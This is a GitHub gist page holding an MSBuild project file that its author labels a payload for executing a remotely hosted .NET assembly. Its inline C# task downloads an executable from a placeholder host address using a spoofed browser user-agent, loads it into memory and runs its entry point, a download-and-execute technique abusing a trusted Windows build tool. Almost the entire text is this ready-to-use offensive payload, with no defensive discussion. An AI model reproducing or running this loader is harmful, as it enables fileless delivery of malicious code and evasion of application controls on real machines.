Skip to content

Instantly share code, notes, and snippets.

@G0ldenGunSec
Last active September 29, 2022 05:40
Show Gist options
  • Save G0ldenGunSec/62b8166c23573fc64c6eeb29e8c5b818 to your computer and use it in GitHub Desktop.
Save G0ldenGunSec/62b8166c23573fc64c6eeb29e8c5b818 to your computer and use it in GitHub Desktop.
MSBuild payload used to execute a remotely-hosted .net assembly
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<Target Name="DemoClass">
<ClassExample />
</Target>
<UsingTask
TaskName="ClassExample"
TaskFactory="CodeTaskFactory"
AssemblyFile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" >
<Task>
<Code Type="Class" Language="cs">
<![CDATA[
using System;
using Microsoft.Build.Framework;
using Microsoft.Build.Utilities;
using System.IO;
using System.Net;
using System.Reflection;
public class ClassExample : Task, ITask
{
public override bool Execute()
{
using (WebClient client = new WebClient())
{
System.Net.ServicePointManager.SecurityProtocol = System.Net.SecurityProtocolType.Tls | System.Net.SecurityProtocolType.Tls11 | System.Net.SecurityProtocolType.Tls12;
client.Headers.Add ("user-agent", "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36");
MemoryStream ms = new MemoryStream(client.DownloadData("http://IP_ADDRESS/ASSEMBLY_NAME.exe"));
BinaryReader br = new BinaryReader(ms);
byte[] bin = br.ReadBytes(Convert.ToInt32(ms.Length));
ms.Close();
br.Close();
Assembly a = Assembly.Load(bin);
string[] args = new string[] {"ASSEMBLY ARGS GO HERE"};
try
{
a.EntryPoint.Invoke(null, new object[] { args });
}
catch
{
MethodInfo method = a.EntryPoint;
if (method != null)
{
object o = a.CreateInstance(method.Name);
method.Invoke(o, null);
}
}
}
return true;
}
}
]]>
</Code>
</Task>
</UsingTask>
</Project>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment